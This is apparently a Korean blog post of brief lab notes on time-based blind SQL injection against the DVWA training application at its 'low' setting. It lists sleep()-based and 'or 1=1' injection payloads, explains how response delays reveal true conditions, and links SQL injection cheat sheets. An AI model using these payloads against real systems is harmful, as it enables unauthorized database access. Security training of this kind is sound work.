728x90
sql 인젝션이란?
https://choimungu.tistory.com/207
공격 실습)
low
1' and sleep(5)#
1' AND sleep(5)#
6' AND sleep(5)#
버프스위트
select user from users where id='1' or1=1#
개발자 네트워크에서 sleep()사용하는
참이면 sleep()값 만큼 값이 미뤄짐
거짓이면 바로 결과가 나오고
time
http://www.securiteam.com/securityreviews/5DP0N1P76E.html
https://en.wikipedia.org/wiki/SQL_injection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
https://www.owasp.org/index.php/Blind_SQL_Injection
http://bobby-tables.com/
'해킹과 보안 동향 > DVWA' 카테고리의 다른 글
dvwa. XSS 공격 #9-1(low) (0) | 2023.06.07 |
---|---|
dvwa. sql 인젝션 #7-2(medium, high, impossible) (0) | 2023.06.06 |
dvwa. sql 인젝션 #7-1(low) (0) | 2023.05.31 |
dvwa. CAPTCHA 공격 #6-2(medium, high, impossible) (0) | 2023.05.31 |
dvwa. 파일 업로드 공격 #5-2(medium, high, impossible) (0) | 2023.05.29 |